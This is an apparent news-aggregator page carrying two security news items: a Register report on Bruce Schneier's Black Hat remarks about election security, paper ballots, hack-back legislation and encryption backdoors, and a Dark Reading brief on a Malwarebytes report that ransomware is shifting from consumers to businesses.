Black Hat While various high-tech solutions to secure electronic voting systems are being touted this week to election officials across the United States, according to infosec guru Bruce Schneier there is only one tried-and-tested approach that should be considered: pen and paper.

It’s the only way to be sure hackers and spies haven’t delved in from across the web to screw with your vote.

“Paper ballots are almost 100 per cent reliable and provide a voter-verifiable paper trail,” he told your humble Reg vulture and other hacks at Black Hat in Las Vegas on Thursday. “This isn’t hard or controversial. We use them all the time in Minnesota, and you make your vote and it’s easily tabulated.”

The integrity of the election process depends on three key areas: the security of the voter databases that list who can vote; the electronic ballot boxes themselves, which Schneier opined were the hardest things to hack successfully; and the computers that tabulate votes and distribute this information.

Election security is a hot topic at the Black Hat and DEF CON hacking conferences this year, and a matter of increasing national concern. Two pieces of legislation, one requiring paper ballots be produced for every vote, and another requiring parties to inform the FBI if foreign governments quietly hit them, passed the US House of Representatives last month.

However, Senate majority leader Mitch McConnell (R-KY) has refused to table the legislation in the upper house, saying the bills were partisan. Entirely coincidentally, it has subsequently come out that “Moscow Mitch” accepted thousands of dollars in lobbying cash from election machine manufacturers.

“The problem with election security is politics,” Schneier said. “We have a party in the US that doesn’t favor voting.”

Warning signs

Schneier’s comments came on the same day that investigative reporter Kim Zetter revealed that America’s election management systems – which are not supposed to stay connected to the internet long term – were, and still are, in fact connected to the internet.

We’re told ten security eggheads found that dozens of back-end election systems manufactured by ES&S had been left facing the internet for ages. The systems are designed to receive preliminary voting tallies from ballot machines after the polls close, remaining online for only a very short period, and yet many were still lingering around on the ’net to this day. They do not count up the final results, it must be stressed: those totals are obtained by extracting data from the memory cards in the individual voting machines and processing all that offline.

The idea is that, during election night after the polls close, these back-end internet-connected systems receive initial tallies from e-voting boxes via SFTP behind a Cisco firewall, yet they end up being left online for many months after. If someone were to hack into these back-end computers and tamper with them on a crucial election evening, the preliminary counts arriving from the e-ballot boxes – figures that are quickly handed to the media for live analysis – could be intercepted and altered so that when the official numbers come in from the memory cards, there is enough mistrust among the public that no one believes which result is real.

It’s a bit of a stretch: you’d need to pwn the SFTP server after getting through the filters on the Cisco firewall. Yet, it would be lovely if officials could get on top of their IT equipment, and take offline systems that are supposed to be offline, as America gears up for the crucial 2020 White House race.

The government is here to help

Schneier also spoke of the importance of technically skilled people getting into government, a topic he has raised before.

The technical knowledge of most congresscritters is sadly lacking, Schneier said, and they need good advice. He pointed to a big improvement in the statements issued by Senator Ron Wyden (D-OR) after the ACLU’s Christopher Soghoian joined his team.

Schneier suggested that technologists can do the most good for the country by avoiding running for public office, and instead join regulatory agencies. Legislators may enact major new laws on technology once a decade or so, but federal agencies are much more flexible and can make policy quickly and often.


He was blisteringly scathing about the Active Cyber Defense Bill, being considered by Congress. The legislation, introduced by House Representative Tom Graves (R-GA), would legalize “hacking back,” whereby if a company is pwned online, it can legally go after its attacker.

“I’m sure there are some IT managers who would love to break out the attack code but it’s a terrible idea,” he said. “There’s a good reason why we give government a monopoly on violence: vigilante mobs get it wrong.”

He was also dismissive of recent noises from the US and other Five Eyes nations about forcing technology companies to introduce backdoors into encryption exclusively for law enforcement to use. Such calls have been going on since the 1990s, he pointed out, and so far it had been all talk.

“We’ve seen the Australian law passed, and the UK is moving on it too,” he said. “But in the US we have a very different relationship with government. Americans just don’t trust their governments as much as the UK and Australia.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/schneier_voting_security/

Ransomware Shifts Focus from Consumers to Businesses

In addition, ransomware seems likely to continue its evolution in the second half of 2019.

For the first time, the number of ransomware attacks against businesses surpassed those against consumers, with the former up 363% in Q2 2019 over Q2 2018, according to a new report from Malwarebytes.

Ransomware seems likely to continue its evolution in the second half of 2019, the report states, as malicious actors use attacks with worm-like functionality, along with ransomware attacks paired with other malware, in their attempts to get through security protections and make the most from their malicious investments.

Looking more deeply into the data, the report found that certain families of ransomware predominated in detections, with Ryuk detections increasing by 88% over the first quarter of 2019, while Phobos exploded 940% in the same period.

Read more here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/ransomware-shifts-focus-from-consumers-to-businesses/d/d-id/1335478?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple